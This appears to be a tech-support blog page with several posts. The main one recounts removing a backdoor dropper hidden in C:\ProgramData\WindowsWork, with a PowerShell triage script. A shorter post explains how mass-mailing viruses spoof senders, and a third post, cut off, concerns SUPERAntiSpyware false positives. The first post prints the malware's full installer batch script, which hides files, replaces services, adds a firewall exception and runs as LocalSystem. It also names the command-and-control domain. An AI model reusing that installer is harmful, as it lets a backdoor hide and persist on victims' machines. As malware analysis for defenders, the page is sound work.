A nasty piece of work in C:\ProgramData\WindowsWork

I encountered a nasty bit of malware today which wasn’t being seen by antivirus. Malwarebytes was popping up every 5 seconds with a warning that some executable file on Windows 10 was trying to reach a blocked web site: tektonit.ru

A quick Google search made it clear that the domain being contacted is associated with the Troj/RemAdm-AG and Backdoor.Gussdoor trojans, the second of which opens a backdoor to the domain in question. The attacker then has access to read and write files, access the registry, spawn processes and even take screenshots. In our case, they also installed keylogger.bestfreekeylogger.a which lets them record keystrokes like passwords, credit card numbers, emails, or any other content entered via the computer.

Nasty.

The user had both a McAfee antivirus product and Avast Free installed, neither of which really complained about the threat, yet Malwarebytes continued its little dance in the corner: “Website blocked – Domain: tektonit.ru” and variants thereof.

Malwarebytes also did something else nice for me: it showed the process location. It was running a file in C:\ProgramData\WindowsWork, a folder which, to an end user, appears not to exist if you try to navigate to it.

I installed ESET Internet Security, which picked up and removed the keylogger (two variants) that the other applications left behind, but the malware reaching out to the attacking server was not detected.

Even from an admin terminal, the directory doesn’t show, since its attributes are set to +s +h (system, hidden). Within the folder, the files themselves are also hidden and flagged system, making them pretty much invisible to end users. And strangely, antivirus also did not see it.

After removing the attributes, I was able to see and open the files. One of them was the installer used to deploy the malware.

Here’s how it installed itself:

@echo off
REM Hide the drop folder from Explorer and a plain "dir" (system + hidden attributes).
attrib +s +h "C:\ProgramData\WindowsWork"
cd C:\ProgramData\WindowsWork\

REM Stop and remove any earlier copy of the service and kill its running processes.
sc stop RManService
sc stop ServiceWork
sc delete RManService
sc delete ServiceWork
taskkill /im rfusclient.exe /f
taskkill /im rutserv.exe /f
reg delete "HKLM\SYSTEM\System Information\Driver" /f

REM Import the bundled registry configuration and install syswork.exe as a service
REM (the /firewall switch presumably adds a firewall exception for it).
regedit /s "C:\ProgramData\WindowsWork\config_set.reg"
"C:\ProgramData\WindowsWork\syswork.exe" /silentinstall
"C:\ProgramData\WindowsWork\syswork.exe" /firewall
regedit /s "C:\ProgramData\WindowsWork\config_set.reg"
REM Make the service restart itself one second after any failure, and run it as LocalSystem.
sc failure ServiceWork reset= 0 actions= restart/1000/restart/1000/restart/1000
sc config ServiceWork obj= LocalSystem type= interact type= own
"C:\ProgramData\WindowsWork\syswork.exe" /start

REM Delete the installer pieces, then hide everything that is left behind.
del C:\ProgramData\WindowsWork\config_set.reg /q
del C:\ProgramData\WindowsWork\WinUpdate.exe /q
del C:\ProgramData\WindowsWork\WorkInstall2.bat /q
attrib +s +h "C:\ProgramData\WindowsWork\*.*"
del C:\ProgramData\WindowsWork\WorkInstall.bat /q

exit

Interesting, in that this sheds some light on why antivirus isn’t picking it up: it’s likely not even a virus. And to boot, UAC would have stopped this script from running, which means the end user had to have allowed it. Once again, this proves my point that Windows UAC is useless, because novice users will just say yes to any stinking dialogue you throw at them!

So the script, as you can see, destroys legitimate Windows services and replaces them with itself. That makes it tough to detect.

I killed the services, deleted the services, and then purged all the files in the C:\ProgramData\WindowsWork\ and removed the folder. Instantly, Malwarebytes went to sleep.
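The two tells described above (a folder under C:\ProgramData carrying both the Hidden and System attributes, and a service whose executable lives under that path) can be turned into a quick triage check for other machines. The following PowerShell script is an added example of mine, not code from the original post or from any of the products it mentions. It assumes an elevated PowerShell 5.1 or later session on the machine being checked; the folder name WindowsWork is not hard-coded, so any such folder under ProgramData is reported.

```powershell
# Added triage example (not from the original post). Run from an elevated PowerShell session.
# Assumption: the drop location follows the pattern in the post, i.e. somewhere under C:\ProgramData.

function Get-HiddenSystemDirectory {
    param([string]$Root = 'C:\ProgramData')
    # -Force makes Get-ChildItem return entries that Explorer and a plain "dir" omit;
    # without it, a +s +h folder is simply never listed.
    Get-ChildItem -LiteralPath $Root -Directory -Force -ErrorAction SilentlyContinue |
        Where-Object {
            $_.Attributes.HasFlag([IO.FileAttributes]::Hidden) -and
            $_.Attributes.HasFlag([IO.FileAttributes]::System)
        }
}

function Get-ServiceUnderPath {
    param([string]$Root = 'C:\ProgramData')
    # Win32_Service exposes the binary path and the account each service runs as,
    # which is where "obj= LocalSystem" from the installer script shows up.
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -like "*$Root*" } |
        Select-Object Name, DisplayName, State, StartMode, StartName, PathName
}

$hits = @(Get-HiddenSystemDirectory)
if ($hits.Count -eq 0) {
    Write-Output 'No Hidden+System directories directly under C:\ProgramData.'
}
foreach ($dir in $hits) {
    Write-Output "Hidden+System directory: $($dir.FullName)"
    # List the contents with -Force as well, since the files inside are hidden the same way.
    Get-ChildItem -LiteralPath $dir.FullName -Force -File -ErrorAction SilentlyContinue |
        Select-Object Name, Length, LastWriteTime, Attributes |
        Format-Table -AutoSize
}

Write-Output 'Services whose executable lives under C:\ProgramData (worth reviewing one by one):'
Get-ServiceUnderPath | Format-Table -AutoSize
```

A hidden, system-flagged folder under ProgramData is unusual but not proof of anything on its own; what makes it worth acting on is the combination with a service that runs from it as LocalSystem. Once a hit is confirmed, cleanup is the sequence from the post: stop and delete the service (sc stop, sc delete), clear the attributes with attrib -s -h on the folder and its contents so the files can be inspected and removed, then delete the folder and rescan.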

A reboot and full system scan as administrator with ESET Internet Security, and all looks well. Hopefully the firewall in EIS will do a better job of keeping the user from answering “Yes” to the wrong questions… but ultimately it’s up to educating users to think, and understand, before clicking.

The malware is gone. However, there’s no way to know how far the attacker got. It appears as though the service files were not viruses at all, but rather basic programs that reach out to tektonit.ru to obtain legitimate malware and install it. Basically, the stuff in C:\ProgramData\WindowsWork\, which the user authorized being installed, was benign from an antimalware standpoint. It was not a virus: it was a tool being used by an attacker to propagate their tools, malware and possibly viruses/trojans. But because of the nature of it, it also worked as a bit of a smokescreen.

In this instance, had Malwarebytes’ Premium version not been installed (which does active protection, not just on-demand scanning), the user would have been wide open to the smokescreen application and its desire to install all kinds of unknowns on the user’s system.

ESET Internet Security is now installed, along with Malwarebytes Premium. These two products combined should provide about the best level of protection available to Windows users today.

Get ESET Internet Security: https://cat5.tv/esetus

Get Malwarebytes Premium: http://amzn.to/2x2HCz2

Why am I receiving virus emails from old friends?

A customer emailed me, puzzled by why they’re suddenly receiving a bunch of virus emails from friends they haven’t spoken to in a number of years.

These types of mass-mail viruses can be very confusing, since they nearly always appear to come from someone you know.

Here’s why and how that happens…

Let’s say someone you haven’t talked to in a few years (we’ll call him “Bruce”), who is part of the same “circle of friends”, caught a virus. The virus goes into his address book, starts mass-mailing everyone in it, and spoofs who each message is from.

Bruce’s address book:

  • John
  • Betty
  • Doug

Bruce gets a virus. The virus sends an email to John pretending to be Betty, and an email to Doug pretending to be John.

Doug replies to John and says “You have a virus!” But John doesn’t have a virus; Bruce does.

It’s often difficult or impossible to track down the true culprit, and that’s why it’s imperative that everyone on Microsoft Windows have an up-to-date virus scanner such as ESET Smart Security 6. It is also important on any platform (Windows, Mac, Linux, or even a smartphone) that you be familiar with phishing scams, and be extra cautious about what you open or click.
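The reason the “From” line cannot be trusted is that it is just a header the sending program writes, exactly like the body text; the only part of a message the sender does not control is the chain of Received headers that each mail server adds as the message passes through. The PowerShell example below is added here and is not part of the original post. It parses a constructed set of headers modelled on the story (the message lands in John’s inbox claiming to be from Betty, but the first server to see it received it from Bruce’s machine); every name, host name and address in it is made up, using the reserved example.com/.net/.org domains and the documentation address 203.0.113.7.

```powershell
# Added example (not from the original post). Constructed headers: "From" says Betty,
# but the bottom Received line shows the message was handed in by Bruce's PC.
$rawHeaders = @'
Return-Path: <betty@example.com>
Received: from mx.example.org (mx.example.org [198.51.100.10])
        by mail.john-isp.example.org with ESMTP id 4Q1; Mon, 3 Jun 2013 09:12:44 -0400
Received: from bruce-pc (cpe-203-0-113-7.example.net [203.0.113.7])
        by mx.example.org with ESMTP id 7xA; Mon, 3 Jun 2013 09:12:40 -0400
From: "Betty" <betty@example.com>
To: "John" <john@example.org>
Subject: Check this out
'@

function Get-SenderEvidence {
    param([string]$Headers)
    # Unfold continuation lines: a line that starts with whitespace continues the previous header.
    $unfolded = $Headers -replace "`r?`n[ \t]+", ' '
    $lines = $unfolded -split "`r?`n"

    $from = $null; $returnPath = $null; $received = @()
    foreach ($line in $lines) {
        if     ($line -match '^From:\s*(.+)$')        { $from = $Matches[1] }
        elseif ($line -match '^Return-Path:\s*(.+)$') { $returnPath = $Matches[1] }
        elseif ($line -match '^Received:\s*(.+)$')    { $received += $Matches[1] }
    }

    # Each server prepends its own Received header, so the LAST one in the list is the
    # first hop: the machine that actually submitted the message to a mail server.
    $firstHop = $null
    if ($received.Count -gt 0 -and $received[-1] -match '^from\s+(\S+)\s+\(([^)]*)\)') {
        $firstHop = "$($Matches[1]) ($($Matches[2]))"
    }

    [pscustomobject]@{
        From         = $from        # written by whoever built the message; the virus picks any address book entry
        ReturnPath   = $returnPath  # envelope sender, also chosen by the submitting program
        FirstHop     = $firstHop    # added by the receiving server, outside the sender's control
        ReceivedHops = $received.Count
    }
}

# For the constructed headers this reports From = "Betty" <betty@example.com> and
# FirstHop = bruce-pc (cpe-203-0-113-7.example.net [203.0.113.7]).
Get-SenderEvidence -Headers $rawHeaders | Format-List
```

Read the Received lines from the top down, trusting each one only as far as you trust the server that added it: a sender can fabricate extra Received lines underneath the real ones, but cannot remove or alter the ones that servers add above them. In the constructed case the first hop is a residential address that has nothing to do with Betty’s provider, which is the strongest hint available from the message itself about whose machine is infected.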

SUPERAntiSpyware falsely detecting Trojan.Agent/Gen-Kryptik

Many SUPERAntiSpyware users are experiencing an annoying (and possibly costly) problem this morning. Apparently their systems became infected with hundreds of copies of Trojan.Agent/Gen-Kryptik over the weekend.

After looking in-depth at a number of client systems, it would appear the alerts are false-positives.